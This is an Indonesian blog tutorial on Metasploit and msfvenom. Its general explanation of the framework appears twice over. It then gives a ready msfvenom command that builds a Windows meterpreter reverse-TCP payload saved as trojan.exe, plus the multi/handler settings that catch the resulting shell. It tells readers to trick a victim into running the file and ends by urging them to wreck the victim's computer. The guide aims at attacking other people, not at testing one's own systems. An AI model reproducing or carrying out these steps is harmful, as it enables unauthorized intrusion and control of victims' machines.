Kali ini saya akan membahas cara remote windows, Linux PC dan Android menggunakan Msfvenom.
Bagi kalian yang pernah menggunakan distro pentest (Backbox,Kali Linux,Backtrack, dll),pasti sudah familiar dengan tools ini. Tapi bagi yang “baru” mencoba pasti terlalu awam dengan nama ini.
Pertama-tama saya akan jelasin apa itu Metasploit.
msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework Pengertian metasploit.
Metasploit merupakan sofware security yang sering digunakan untuk menguji coba ketahanan suatu sistem dengan cara mengeksploitasi kelemahan software suatu sistem.
Metasploit diciptakan oleh HD Moore pada tahun 2003 sebagai sebuah alat jaringan portabel menggunakan bahasa scripting Perl. Kemudian, Metasploit Framework benar-benar ditulis ulang dalam bahasa pemrograman Ruby. Pada tanggal 21 Oktober 2009, Proyek Metasploit mengumumkan yang telah diakuisisi oleh Rapid7, sebuah perusahaan keamanan yang menyediakan solusi kerentanan manajemen terpadu. Seperti produk komersial yang sebanding seperti kanvas Imunitas atau Inti Dampak Core Security Technologies, Metasploit dapat digunakan untuk menguji kerentanan sistem komputer untuk melindungi mereka atau untuk masuk ke sistem remote. Seperti alat-alat keamanan banyak informasi, Metasploit dapat digunakan untuk kegiatan baik yang sah dan tidak sah. Sejak akuisisi dari Metasploit Framework. Metasploit biasanya digunakan untuk menyerang application layer dengan 0 day attack yang merupakan metode penyerangan pada software yang belum di patch. Metasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya penyerang berada pada jarak jangkauan yang jauh dapat mengendalikan komputer korban. Metasploit menyerang dengan cara mengirimkan exploit pada komputer korban. Exploit ini berisi payload yang sudah ditentukan oleh penyerang. Exploit adalah software yang berfungsi untuk memanfaatkan kelemahan pada software korban(misal web browser), setelah berhasil mengeksploitasinya exploit tersebut memasukkan payload ke dalam memori korban. Payload merupakan sebuah executable milik penyerang yang akan di run pada komputer korban dengan tujuan dapat mengendalikan komputer tersebut secara remote atau memasang backdoor, trojan, virus, worm, dan lain-lain. Terlepas dari penggunaan metasploit yang disalah gunakan untuk kejahatan, software ini juga membantu System Security untuk memperkuat pertahanan jaringannya dari ulah penyerang dari luar. Oke deh,,langsung ke step2 nya aja.
1. Buka terminal dan ketik “msfconsole”,setelah itu akan muncul seperti ini
Read More ->>
Bagi kalian yang pernah menggunakan distro pentest (Backbox,Kali Linux,Backtrack, dll),pasti sudah familiar dengan tools ini. Tapi bagi yang “baru” mencoba pasti terlalu awam dengan nama ini.
Pertama-tama saya akan jelasin apa itu Metasploit.
msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework Pengertian metasploit.
Metasploit merupakan sofware security yang sering digunakan untuk menguji coba ketahanan suatu sistem dengan cara mengeksploitasi kelemahan software suatu sistem.
Metasploit diciptakan oleh HD Moore pada tahun 2003 sebagai sebuah alat jaringan portabel menggunakan bahasa scripting Perl. Kemudian, Metasploit Framework benar-benar ditulis ulang dalam bahasa pemrograman Ruby. Pada tanggal 21 Oktober 2009, Proyek Metasploit mengumumkan yang telah diakuisisi oleh Rapid7, sebuah perusahaan keamanan yang menyediakan solusi kerentanan manajemen terpadu. Seperti produk komersial yang sebanding seperti kanvas Imunitas atau Inti Dampak Core Security Technologies, Metasploit dapat digunakan untuk menguji kerentanan sistem komputer untuk melindungi mereka atau untuk masuk ke sistem remote. Seperti alat-alat keamanan banyak informasi, Metasploit dapat digunakan untuk kegiatan baik yang sah dan tidak sah. Sejak akuisisi dari Metasploit Framework. Metasploit biasanya digunakan untuk menyerang application layer dengan 0 day attack yang merupakan metode penyerangan pada software yang belum di patch. Metasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya penyerang berada pada jarak jangkauan yang jauh dapat mengendalikan komputer korban. Metasploit menyerang dengan cara mengirimkan exploit pada komputer korban. Exploit ini berisi payload yang sudah ditentukan oleh penyerang. Exploit adalah software yang berfungsi untuk memanfaatkan kelemahan pada software korban(misal web browser), setelah berhasil mengeksploitasinya exploit tersebut memasukkan payload ke dalam memori korban. Payload merupakan sebuah executable milik penyerang yang akan di run pada komputer korban dengan tujuan dapat mengendalikan komputer tersebut secara remote atau memasang backdoor, trojan, virus, worm, dan lain-lain. Terlepas dari penggunaan metasploit yang disalah gunakan untuk kejahatan, software ini juga membantu System Security untuk memperkuat pertahanan jaringannya dari ulah penyerang dari luar. Oke deh,,langsung ke step2 nya aja.
1. Buka terminal dan ketik “msfconsole”,setelah itu akan muncul seperti ini
Hacking with Meterpreter Payload
- Buka terminal baru dan ketikkan seperti ini root@brotx:~# msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a
x86 -f exe LHOST=IPlu LPORT=portlu -o /root/Desktop/trojan.exe
Ket: -p = payload
lhost= itu ip kita (bisa cek di “ifconfig”)
lport = disini saya menggunakan port1337
-f = File format ==>> trojan.exe
- Sekarang file “backdoor” yang kita buat tadi tersimpan di /root/Desktop/trojan.exe
- Now we need to set up a listener to handle reverse connection sent by
victim when the exploit successfully executed. (sok keminggirs.. :v) Ketik command dibawah ini ke terminal yang udah ente msfconsole tadi :v
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (IP)
set lport (port)
exploit - kemudian kirim ke victim dan suruh mengeksekusi file tersebut.
Nahh…lagi2 soceng dipergunakan dalam teknik ini. Tadi saya membuat file
dengan nama trojan.exe. Jika victim sudah menjalankan/eksekusi baru kita ketik “exploit”. Now you can directly access the victim shell.
silahkan anda acak acak komputer korban zhuahaha
